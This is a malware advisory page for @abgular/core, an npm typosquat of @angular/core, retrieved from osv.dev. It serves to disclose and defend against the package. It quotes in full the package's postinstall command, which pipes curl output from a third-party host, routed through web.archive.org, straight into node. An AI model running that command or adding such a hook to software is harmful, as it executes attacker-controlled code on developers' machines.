Logo
npm

@abgular/core@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17532

Ecosystem

npm

Summary

Package name @abgular/core is a single-character transposition of @angular/core and copies that package's description, author, and repository metadata. The package.json declares a postinstall script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from a third-party code-hosting service via web.archive.org and piping it directly into node during npm install. The fetched code executes on the installer's machine with the installer's privileges; its contents are mutable and attacker-controlled. The deceptive package identity ensures developers who mistype @angular/core trigger this remote-code execution.

Source: amazon-inspector (4c4c8470613dc3a49e249f1a9f91bc756bb9b4323c78268b35816f07e78a0a9b)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.